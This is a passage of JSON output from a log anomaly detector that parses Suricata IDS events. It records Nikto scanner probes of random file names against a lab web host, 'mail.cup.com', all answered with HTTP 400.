"/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46956,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46956, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":776469941489987,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 776469941489987, 
"/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.365913+0000\",\"flow_id\":776469941489987,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46956,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.config\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.config\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.37 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.367902 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46958 -> 192.168.10.154:80", "/parser/model/time": 1583349514.367902, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command 
Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46958, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.367902 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46958 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.37 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.et", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.368167+0000\",\"flow_id\":829521377532493,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46958,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.et\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.et\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.368167, "/parser/model/plus_sign": "+", 
"/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":829521377532493,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46958,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.et\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.et\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46958,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.et\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.et\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.et\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": 
"\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.et\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.et", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.et", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, 
"/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46958,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46958, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":829521377532493,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 829521377532493, 
"/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.368167+0000\",\"flow_id\":829521377532493,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46958,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.et\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.et\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.37 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.370560 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46960 -> 192.168.10.154:80", "/parser/model/time": 1583349514.37056, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", 
"/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46960, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.370560 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46960 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.37 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.cmd", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.370766+0000\",\"flow_id\":380826144121724,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46960,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cmd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cmd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.370766, "/parser/model/plus_sign": "+", 
"/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":380826144121724,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46960,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cmd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cmd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46960,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cmd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cmd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.cmd\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": 
"\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.cmd\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.cmd", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.cmd", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 
226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46960,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46960, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":380826144121724,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 380826144121724, 
"/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.370766+0000\",\"flow_id\":380826144121724,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46960,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cmd\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cmd\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.37 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.372779 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46962 -> 192.168.10.154:80", "/parser/model/time": 1583349514.372779, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command 
Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46962, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.372779 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46962 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.37 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.x-shop", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.373160+0000\",\"flow_id\":319004384865496,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46962,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.x-shop\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.x-shop\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.37316, 
"/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":319004384865496,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46962,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.x-shop\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.x-shop\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46962,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.x-shop\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.x-shop\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.x-shop\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", 
